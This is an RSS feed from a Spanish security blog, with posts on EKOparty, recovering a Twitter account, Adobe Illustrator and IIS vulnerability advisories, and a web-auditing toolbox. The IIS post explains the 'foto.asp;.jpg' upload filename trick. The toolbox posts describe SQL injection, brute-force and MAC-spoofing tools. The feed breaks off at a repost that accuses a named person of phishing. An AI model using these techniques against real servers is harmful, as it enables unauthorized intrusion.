<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>En Manos de Nadie &#187; Seguridad</title>
	<atom:link href="http://www.enmanosdenadie.com.ar/category/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.enmanosdenadie.com.ar</link>
	<description>Software libre, diseño web y seguridad informática.</description>
	<lastBuildDate>Mon, 21 Nov 2011 17:57:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>EKO party Security Conference 7&#8242; edition</title>
		<link>http://www.enmanosdenadie.com.ar/2011/10/eko-party-security-conference-7-edition/</link>
		<comments>http://www.enmanosdenadie.com.ar/2011/10/eko-party-security-conference-7-edition/#comments</comments>
		<pubDate>Sun, 02 Oct 2011 13:59:06 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[Eventos]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[back hat]]></category>
		<category><![CDATA[DB]]></category>
		<category><![CDATA[eko]]></category>
		<category><![CDATA[ekoparty]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[grey hat]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[konex]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[sec]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[seg]]></category>
		<category><![CDATA[sql inyection]]></category>
		<category><![CDATA[white hat]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=1416</guid>
		<description><![CDATA[El miércoles 21, junto con la llegada de la primavera, se celebró la cumbre hacker más importante de sudamérica en Buenos Aires: EKOparty 2011 &#160; &#160; &#160; &#160; &#160; &#160; &#160;]]></description>
			<content:encoded><![CDATA[<h4>El miércoles 21, junto con la llegada de la primavera, se celebró la <span style="color: #ff0000;"><strong>cumbre hacker</strong></span> más importante de sudamérica en <strong>Buenos Aires</strong>:</h4>
<h1><strong><span style="color: #ff0000;">EKOparty 2011</span></strong></h1>
<p><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/01.png"><img class="size-full wp-image-1427 alignnone" title="01" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/01.png" alt="" width="658" height="274" /></a></p>
<p><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/06.png"><img class="alignnone size-full wp-image-1428" title="06" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/06.png" alt="" width="658" height="274" /></a></p>
<p><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-6.jpg"><img class="size-large wp-image-1424 alignnone" title="11 - 6" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-6-1024x575.jpg" alt="" width="1024" height="575" /></a></p>
<p><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-3.jpg"><img class="size-large wp-image-1422 alignnone" title="11 - 3" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-3-1024x575.jpg" alt="" width="1024" height="575" /></a><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-4.jpg"><img class="size-large wp-image-1423 alignnone" title="11 - 4" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-4-1024x575.jpg" alt="" width="1024" height="575" /></a></p>
<p><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-7.jpg"><img class="size-large wp-image-1425 alignnone" title="11 - 7" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-7-1024x575.jpg" alt="" width="1024" height="575" /></a></p>
<p><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-1.jpg"><img class="alignleft size-full wp-image-1420" title="11 - 1" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-1.jpg" alt="" width="409" height="720" /></a><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-8.jpg"><img class="alignleft size-full wp-image-1426" title="11 - 8" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-8.jpg" alt="" width="404" height="720" /></a><a href="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-2.jpg"><img class="alignleft size-full wp-image-1421" title="11 - 2" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/09/11-2.jpg" alt="" width="404" height="720" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2011/10/eko-party-security-conference-7-edition/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>¿Cómo Recuperar una Cuenta de Twitter?</title>
		<link>http://www.enmanosdenadie.com.ar/2011/09/%c2%bfcomo-recuperar-una-cuenta-de-twitter/</link>
		<comments>http://www.enmanosdenadie.com.ar/2011/09/%c2%bfcomo-recuperar-una-cuenta-de-twitter/#comments</comments>
		<pubDate>Thu, 01 Sep 2011 21:13:07 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[cuenta]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackeado]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[phising]]></category>
		<category><![CDATA[recuperar]]></category>
		<category><![CDATA[robo de cuenta]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=1412</guid>
		<description><![CDATA[Twitter es una de las red sociales con mas crecimiento en los últimos años, ya que de forma simple permite a cualquier persona desde virtualmente “cualquier parte” publicar pequeñas piezas de texto (no mas de 140 caracteres) que puede ser visualizada por otras personas instantáneamente, lo que la ha convertido en una herramienta muy útil [...]]]></description>
			<content:encoded><![CDATA[<p><a name="1321aa55f35f7b80_1" href="http://feedproxy.google.com/%7Er/LaWebDeDragon/%7E3/Uj6PIFd86Ac/como-recuperar-una-cuenta-de-twitter.xhtml?utm_source=feedburner&amp;utm_medium=email" target="_blank"></a><img class="size-full wp-image-1413 alignnone" title="twitter-hacked" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2011/08/twitter-hacked.jpg" alt="" width="386" height="228" /></p>
<p><a title="Entradas etiquetadas con Twitter" href="http://www.dragonjar.org/tag/twitter" rel="tag" target="_blank">Twitter</a> es una de las red sociales con mas crecimiento en los últimos años, ya que de forma simple permite a cualquier persona desde virtualmente <em>“cualquier parte”</em> publicar pequeñas piezas de texto <em>(no mas de 140 caracteres)</em> que puede ser visualizada por otras personas instantáneamente, lo que la ha convertido en una herramienta muy útil para personas, medios de comunicación, famosos, <del>y una que otra revolución</del> etc…</p>
<p>Para algunas personas perder su <a title="Entradas etiquetadas con Cuenta" href="http://www.dragonjar.org/tag/cuenta" rel="tag" target="_blank">cuenta</a> de Twitter es mucho peor que perder un ser querido y si <a href="http://www.youtube.com/watch?v=PJrdPX1czoo" rel="nofollow" target="_blank">no pueden a acceder a ella pierden la cabeza</a>, por eso <del>(antes que alguien comenta una locura)</del> escribimos estas lineas, para que cualquier persona pueda recuperar su cuenta de Twitter fácilmente, utilizando los medios que esta red social nos proporciona.</p>
<p>Lo primero que debemos hacer <del>si es que no lo has hecho</del> es <a href="http://twitter.com/account/resend_password" rel="nofollow" target="_blank">ingresar a este formulario</a> <em>(el aspecto de estos formularios puede cambiar con el tiempo, pero la esencia NO, por lo que este articulo debe servirte aunque el sitio parezca diferente)</em>, donde nos piden nuestra cuenta de <a title="Entradas etiquetadas con Correo" href="http://www.dragonjar.org/tag/correo" rel="tag" target="_blank">correo</a> electrónico y un código CAPTCHA.</p>
<p>&nbsp;</p>
<p>Si todo sale bien, a tu correo llegara un enlace por el cual puedes cambiar tu contraseña fácilmente, pero si estas leyendo este articulo, lo mas seguro es que tu cuenta de correo electrónico también fue comprometida <em>(<a href="http://www.dragonjar.org/recuperar-cuenta-de-msn-messenger-hotmail-legalmente.xhtml" target="_blank">ver recuperar cuentas de hotmail</a>)</em> y no puedes recuperar tu contraseña por este medio, en estos casos Twitter pone a nuestra disposición el siguiente procedimiento para que de todas formas podamos recuperar nuestra cuenta.</p>
<p><a href="http://support.twitter.com/groups/32-something-s-not-working/topics/115-can-t-login/articles/371589-mi-cuenta-ha-sido-comprometida-hackeada-y-no-puedo-entrar" rel="nofollow" target="_blank">Entramos a esta dirección dentro del centro de ayuda de Twitter</a> y buscamos el enlace <em><strong><a href="http://support.twitter.com/requests/new" rel="nofollow" target="_blank">“solicitud de ayuda”</a>…</strong></em></p>
<p>Una vez en el menú <em><strong>AYUDA</strong></em> de Twitter elegimos la opción <em><strong><a href="http://support.twitter.com/forms/general" rel="nofollow" target="_blank">“Todo lo demás”</a>…</strong></em></p>
<p>Encontraremos un formulario de contacto, donde debemos seleccionar la opción <em><strong>“Phishing o cuenta hackeada”</strong></em> y llenar <strong>TODA</strong> la información que nos solicitan…</p>
<p>Después de estos pasos, solo debemos esperar que se comuniquen con nosotros para restablecer nuestros acceso a la cuenta de Twitter y LISTO…</p>
<p>Recuerda que por lo menos en <a title="Entradas etiquetadas con Colombia" href="http://www.dragonjar.org/tag/colombia" rel="tag" target="_blank">Colombia</a>, el acceso NO AUTORIZADO a tu información privada <em>(en esta categoría están incluidas las redes sociales y cuentas de correo)</em> es penalizado <a href="http://www.secretariasenado.gov.co/senado/basedoc/ley/2000/ley_0599_2000_pr010.html#269F" rel="nofollow" target="_blank">en el ARTICULO 269F de la ley 1273 del 2009</a>, por lo que es recomendable denunciar el caso a las autoridades pertinentes para que este delito no quede impune.</p>
<h2>Algunos consejos adicionales POST recuperación:</h2>
<ul>
<li>NO ingresar a tus cuentas de correos o <a title="redes sociales" href="http://www.dragonjar.org/tag/redes-sociales" target="_blank">redes sociales</a>, desde conexiones publicas <em>(Centros Comerciales, Universidades, Congresos, Terminales, Aeropuertos, Restaurantes, Etc…)</em> y desconfía de cualquier conexión que este abierta <em>(sin <a title="seguridad" href="http://www.dragonjar.org/" target="_blank">seguridad</a>)</em>.</li>
<li>Analizar tu computador y todos los computadores desde donde accedes a tu cuenta, con un software <a href="http://www.dragonjar.org/anti-keylogger/" target="_blank">Anti Keyloggers</a> y un buen <a href="http://www.dragonjar.org/anti-virus/" target="_blank">Anti Virus</a> ya que el uso de estas herramientas es un método comúnmente utilizado para <a title="Entradas etiquetadas con Robar" href="http://www.dragonjar.org/tag/robar" rel="tag" target="_blank">robar</a> tus datos de acceso.</li>
<li>No abras archivos adjuntos, ni accedas a enlaces de personas desconocidas, si la persona que te lo envía es conocida, preguntale primero qué es antes de abrirlo, muchas veces el malware envía enlaces y adjuntos maliciosos desde las cuentas de tus conocidos sin que ellos se enteren.</li>
<li>Utiliza una contraseña segura, que tenga mínimo 8 caracteres combinados entre números, letras y símbolos <em>(#@!*&amp;^%. etc..)</em> que sea fácil de recordar, pero difícil de adivinar.</li>
<li>Nunca publiques tu <a title="Entradas etiquetadas con Clave" href="http://www.dragonjar.org/tag/clave" rel="tag" target="_blank">clave</a>, y si  es de vida o muerte hacerlo, cambia tu contraseña y tu pregunta secreta, tan pronto puedas hacerlo.</li>
</ul>
<p>Ademas es recomendable que te leas los <a href="http://www.dragonjar.org/consejos-para-hacer-correcto-uso-de-las-redes-sociales.xhtml" target="_blank">Consejos para hacer correcto uso de las redes sociales</a> y la <a href="http://www.dragonjar.org/configurar-privacidad-en-redes-sociales.xhtml" target="_blank">guía para configurar la privacidad en las redes sociales</a> , como también los pasos para recuperar cuentas de <a href="http://www.dragonjar.org/recuperar-cuenta-de-msn-messenger-hotmail-legalmente.xhtml" target="_blank">Hotmail, Messenger</a> y <a href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" target="_blank">Facebook</a>.</p>
<p>&nbsp;</p>
<p>Fuente: <a title="(http://www.dragonjar.org)" href="http://www.dragonjar.org/" target="_blank">La WeB de DragoN</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2011/09/%c2%bfcomo-recuperar-una-cuenta-de-twitter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Buffer Overflow en Adobe Illustrator CS4 y Cs3</title>
		<link>http://www.enmanosdenadie.com.ar/2010/01/adobe-illustrator-buffer-overflow-cs4-cs3/</link>
		<comments>http://www.enmanosdenadie.com.ar/2010/01/adobe-illustrator-buffer-overflow-cs4-cs3/#comments</comments>
		<pubDate>Mon, 11 Jan 2010 06:37:31 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[código]]></category>
		<category><![CDATA[cs4]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[illustrator]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=1013</guid>
		<description><![CDATA[Adobe Illustrator: Ejecución remota de código arbitrario Se han publicado múltiples vulnerabilidades en Adobe Illustrator que podrían ser aprovechadas para realizar ejecución remota de código arbitrario. Versiones Afectadas Esta vulnerabilidad ha sido confirmada en: Adobe Illustrator CS4 (versión 14.0.0) Adobe Illustrator CS3 (versión 13.0.3 y anteriores) Nota: las plataformas afectadas son Windows y Macintosh. Detalle [...]]]></description>
			<content:encoded><![CDATA[<table border="0" width="69%">
<tbody>
<tr>
<td><strong><span style="font-family: Arial,sans-serif;">Adobe Illustrator: Ejecución remota de código arbitrario<br />
</span></strong></td>
</tr>
<tr>
<td>Se han publicado múltiples vulnerabilidades en Adobe Illustrator que podrían ser aprovechadas para realizar ejecución remota de código arbitrario.</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td><strong>Versiones Afectadas</strong></td>
</tr>
<tr>
<td>Esta vulnerabilidad ha sido confirmada en:</p>
<ul>
<li>Adobe Illustrator CS4 (versión 14.0.0)</li>
<li>Adobe Illustrator CS3 (versión 13.0.3 y anteriores)</li>
</ul>
<p>Nota: las plataformas afectadas son Windows y Macintosh.</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td><strong>Detalle</strong></td>
</tr>
<tr>
<td>Múltiples errores en el tratamiento de datos de gran tamaño en archivos Encapsulated Postscript (.eps) podrían ser aprovechados para causar desbordamiento de búfer y ejecutar código arbitrario a través de un archivo especialmente diseñado.</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td><strong>Impacto</strong></td>
</tr>
<tr>
<td>El impacto de estas vulnerabilidades es <strong>CRÍTICO.</strong></p>
<p><strong>Fuente: </strong><a href="http://www.adobe.com/support/security/bulletins/apsb10-01.html" target="_blank">http://www.adobe.com/support/security/bulletins/apsb10-01.html</a></td>
</tr>
</tbody>
</table>
<p>El exploit para <strong>detonar esta vulnerabilidad</strong> (php que genera el archivo .eps ) :  <a href="http://www.exploit-db.com/exploits/10281" target="_blank"> exploit</a> :D</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2010/01/adobe-illustrator-buffer-overflow-cs4-cs3/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>nueva VULNERABILIDAD Microsoft Internet Information Services (IIS)</title>
		<link>http://www.enmanosdenadie.com.ar/2009/12/nueva-vulnerabilidad-microsoft-internet-information-services-iis/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/12/nueva-vulnerabilidad-microsoft-internet-information-services-iis/#comments</comments>
		<pubDate>Mon, 28 Dec 2009 20:38:16 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[falla]]></category>
		<category><![CDATA[IIS]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[vulnerabilidad]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=987</guid>
		<description><![CDATA[Microsoft Internet Information Services (IIS) &#8211; Servidor Web: Ejecución remota de código arbitrario Se ha reportado una vulnerabilidad en Microsoft Internet Information Services (IIS) &#8211; Servidor Web que permitiría a un atacante remoto realizar ejecución remota de código arbitrario. Versiones Afectadas Esta vulnerabilidad ha sido confirmada en: Microsoft Internet Information Services (IIS) 6 corriendo en [...]]]></description>
			<content:encoded><![CDATA[<table style="height: 465px;" border="0" width="549">
<tbody>
<tr>
<td><strong><span style="font-family: Arial,sans-serif;">Microsoft Internet Information Services (IIS) &#8211; Servidor Web: Ejecución remota de código arbitrario<br />
</span></strong></td>
</tr>
<tr>
<td>Se ha reportado una vulnerabilidad en Microsoft Internet Information Services (IIS) &#8211; Servidor Web que permitiría a un atacante remoto realizar ejecución remota de código arbitrario.</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td><strong>Versiones Afectadas</strong></td>
</tr>
<tr>
<td>Esta vulnerabilidad ha sido confirmada en:</p>
<ul>
<li>Microsoft Internet Information Services (IIS) 6 corriendo en Windows Server 2003 R2 SP2 completamente actualizado.</li>
</ul>
<p>Nota: otras versiones también podrían estar afectadas.</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td><strong>Detalle</strong></td>
</tr>
<tr>
<td>El error se provoca al no filtrar correctamente el carácter &#8220;;&#8221; en el nombre de un archivo. De este modo un atacante remoto podría subir al servidor un archivo ASP y ejecutar su contenido suplantando, por ejemplo, una imagen. Aunque IIS incorpora una medida de seguridad que evita ejecutar código cuando un archivo tiene múltiple extensión, la falla permite que si se consigue subir un archivo llamado &#8220;foto.asp;.jpg&#8221; al servidor, la aplicación lo tome como una imagen, pero en realidad se ejecute su código ASP al invocarlo.</p>
<p>El hecho de que un atacante pueda ejecutar código ASP arbitrario en un servidor, abre un amplio abanico de posibilidades. Dependiendo de la configuración, quedará comprometida no solo la página, sino todo el servidor que lo aloja.</p>
<p>Para poder aprovechar esta vulnerabilidad es necesario que el servidor permita subir archivos. El atacante sólo debe realizar un simple cambio en la extensión del nombre del archivo. Dado que muchas aplicaciones web permiten subir archivos fotográficos (por ejemplo a modo de &#8220;avatar&#8221;) el impacto en estos servidores es importante.</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td><strong>Impacto</strong></td>
</tr>
<tr>
<td>El impacto de estas vulnerabilidades es <strong>ALTO.</strong></p>
<p>Alerta original:<br />
<a href="http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf" target="_blank">http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf</a></p>
<p>Hispasec:<br />
<a href="http://www.hispasec.com/unaaldia/4080/" target="_blank">http://www.hispasec.com/unaaldia/4080/</a></p>
<p>Microsoft:<br />
<a href="http://blogs.technet.com/msrc/archive/2009/12/27/new-reports-of-a-vulnerability-in-iis.aspx" target="_blank">http://blogs.technet.com/msrc/archive/2009/12/27/new-reports-of-a-vulnerability-in-iis.aspx</a></td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/12/nueva-vulnerabilidad-microsoft-internet-information-services-iis/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Corazones 0.1.2</title>
		<link>http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-2/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-2/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 01:11:50 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Programación]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software Libre]]></category>
		<category><![CDATA[corazones]]></category>
		<category><![CDATA[toolbox]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=954</guid>
		<description><![CDATA[Bueno, luego de un finde a puro codear, tengo una nueva release de Corazones. Les cuento las novedades. https://sourceforge.net/projects/corazones/ VERSION 0.1.2 Novedades en esta versión: - Sistema de alerta de nuevas versiones. Al estar disponible una nueva versión, muestra un cartel ofreciendo el link de descarga. ( esto funciona mediante un ping a un txt [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno, luego de un finde a puro codear, tengo una nueva release de Corazones. Les cuento las novedades.</p>
<p><a href="http://www.diosdelared.com/redirect.php?go=https://sourceforge.net/projects/corazones/" target="link">https://sourceforge.net/projects/corazones/</a></p>
<p><strong> VERSION 0.1.2</strong></p>
<p><strong>Novedades en esta versión:</strong><br />
<strong><br />
<strong>-</strong></strong> Sistema de alerta de nuevas versiones. Al estar disponible una nueva versión, muestra un cartel ofreciendo el link de descarga. ( esto funciona mediante un ping a un txt que guarda el número de la última versión disponible.<br />
<strong><strong>-</strong></strong> Agregada una nueva herramienta: <strong>Reverse DNS</strong>.  Al ingresar un host o IP nos indica los sitios web alojados en el mismo servidor.<br />
<strong> <strong>-</strong></strong> Agregada otra nueva herramienta:<strong> Diccionarios / Brute force</strong> . Esta herramienta esta aún incompleta, pero ya ofrece 13 diccionarios <strong>selectos</strong> especialmente (no son cualquier basura) que se pueden utilizar en cualquier tipo de aplicación que necesite de ellos, por ejemplo &#8220;aircrack&#8221; o &#8220;hydra&#8221;. En próximas versiones se incluirá un script para testear fuerza bruta directamente desde Corazones.<br />
<strong><strong>-</strong> </strong>Nuevo sistema de &#8220;mostrar / ocultar&#8221; herramientas con JS, con un click aparecen y al darle de nuevo se cierran.</p>
<p>Gracias a la gente interesada que aporto scripts nuevos, ideas, etc. y a todos por el apoyo!</p>
<p>saludxs</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Corazones 0.1.1</title>
		<link>http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-1/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-1/#comments</comments>
		<pubDate>Thu, 17 Dec 2009 03:13:51 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software Libre]]></category>
		<category><![CDATA[corazones]]></category>
		<category><![CDATA[toolbox]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=949</guid>
		<description><![CDATA[Bueno, ya está en SourceForge una release nueva del proyecto (0.1.1) Feature list: # Arreglé un par de detalles menores. # Incorporé una nueva herramienta:   Diccionarios / Brute Force Es un gestor que permite almacenar los diccionarios y revisarlos, y en un futuro permitirá eliminar palabras repetidas, mergear diccionarios y lógicamente utilizarlos para hacer alguna [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno, ya está en SourceForge una <a href="https://sourceforge.net/projects/corazones/" target="_blank">release nueva del proyecto (<strong>0.1.1</strong>)</a></p>
<p>Feature list:</p>
<p># Arreglé un par de detalles menores.<br />
# Incorporé una nueva herramienta:   Diccionarios / Brute Force<br />
Es un gestor que permite almacenar los diccionarios y revisarlos, y en un futuro permitirá eliminar palabras repetidas, mergear diccionarios y lógicamente utilizarlos para hacer alguna prueba de fuerza bruta.</p>
<p><a href="https://sourceforge.net/projects/corazones/"><img class="alignnone size-full wp-image-952" title="corazonesBF" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/12/corazonesBF.jpg" alt="corazonesBF" width="434" height="528" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Corazones Web Toolbox</title>
		<link>http://www.enmanosdenadie.com.ar/2009/12/corazones-web-toolbox/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/12/corazones-web-toolbox/#comments</comments>
		<pubDate>Sun, 13 Dec 2009 21:56:53 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Programación]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software Libre]]></category>
		<category><![CDATA[auditoría]]></category>
		<category><![CDATA[corazones]]></category>
		<category><![CDATA[toolbox]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=941</guid>
		<description><![CDATA[Pasaron unos días desde mi último post, es que estuve ocupando mi poco tiempo libre en avanzar este nuevo proyecto, les cuento de que se trata. Desde hace algún tiempo al leer los post de los usuarios de Diosdelared.com veo que existen muchos scripts para tareas variadas referidas a la web, pero cada uno a [...]]]></description>
			<content:encoded><![CDATA[<p>Pasaron unos días desde mi último post, es que estuve ocupando mi poco tiempo libre en avanzar este nuevo proyecto, les cuento de que se trata.</p>
<p>Desde hace algún tiempo al leer los post de los usuarios de <a href="http://www.diosdelared.com/" target="_blank">Diosdelared.com</a> veo que existen muchos scripts para tareas variadas referidas a la web, pero cada uno a su modo, en distintos lenguajes, con distinta estética, etc.  Por lo que se me ocurrió nuclear esos scripts formando una toolbox. Eso es <a href="https://sourceforge.net/projects/corazones/" target="_blank">Corazones</a>, un conjunto de herramientas para auditoría en redes y uso general.</p>
<p><a href="https://sourceforge.net/projects/corazones/"><img class="alignnone size-full wp-image-944" title="corazones" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/12/corazones.jpg" alt="corazones" width="600" height="440" /></a></p>
<p>La tarea de agrupar estos script no es tan fácil como parece, pero va tomando forma. Además no es solo agruparlos, casi todos los script tuvieron modificaciones para &#8220;pulirlos&#8221;, mejorando la usabilidad y agregando funcionalidades.</p>
<p>Algunas de las herramientas que ya incluye (se irán agregando más)</p>
<p><strong>MAC spoofing</strong><br />
Este pequeño script nos acelera el uso de macchange para cambiar la <a href='http://es.wikipedia.org/wiki/dirección_MAC' target='_blank'>dirección MAC</a> de nuestra interfaz de red. Uno de los usos puede ser bypassear filtrado por MAC de un Access Point.</p>
<p><strong>Port Scanner</strong><br />
Bueno, no necesita explicación, pasamos un host (local o remoto) y nos muestra los puertos abiertos.</p>
<p><strong>Admin panel finder<br />
</strong> Esta herramienta nos ayuda a encontrar la puerta de entrada al backend de una aplicación o sitio web.</p>
<p><strong>General Inyection Explorer</strong><br />
Esta excelente herramienta permite explotar una inyección de SQL recorriendo completamente la BD en forma visual.</p>
<p><strong>MD5 multi search</strong><br />
Ingresando un md5 nos busca en 16 sitios distintos la palabra a la que corresponde el hash.</p>
<p><strong>Metasploit Launcher</strong><br />
Un lanzador de la interfaz web del framework Metasploit.</p>
<p>Lo más importante:  <a href="https://sourceforge.net/projects/corazones/" target="_blank"><strong>este proyecto es abierto</strong></a>, estan<strong> bienvenidos</strong> todos los que quieran participar ya sea con sus propios scripts o como sea.<br />
El proyecto es software libre, tiene licencia <a href='http://es.wikipedia.org/wiki/GPL' target='_blank'>GPL.<br</a> />
Se puede bajar para probarlo desde su <a href="https://sourceforge.net/projects/corazones/" target="_blank">sitio oficial</a> en Sourceforge.</p>
<p>Saludxs!<br />
Diego</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/12/corazones-web-toolbox/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Tuquito con sabor amargo</title>
		<link>http://www.enmanosdenadie.com.ar/2009/11/tuquito-con-sabor-amargo/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/11/tuquito-con-sabor-amargo/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 13:37:47 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Mauro]]></category>
		<category><![CDATA[mauro torres]]></category>
		<category><![CDATA[msn]]></category>
		<category><![CDATA[Murder]]></category>
		<category><![CDATA[phising]]></category>
		<category><![CDATA[Torres]]></category>
		<category><![CDATA[tuquito]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=742</guid>
		<description><![CDATA[A continuación les dejo  el post de Lisandro Lizaeta donde expone una investigación sobre Mauro Torres, creador de la distribución Tuquito y supuesto administrador de al menos un sitio dedicado al robo de cuentas de MSN. &#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.. A continuación el post de Lizandro Lezaeta:  (fuente) Hola a todos, escribo este artículo para evidenciar públicamente la [...]]]></description>
			<content:encoded><![CDATA[<p>A continuación les dejo  el post de Lisandro Lizaeta donde expone una investigación sobre Mauro Torres, creador de la distribución Tuquito y supuesto administrador de al menos un sitio dedicado al robo de cuentas de MSN.</p>
<p>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..</p>
<p>A continuación el post de Lizandro Lezaeta:  (<a href="http://murder.diosdelared.com/?coment=3837" target="_blank">fuente</a>)</p>
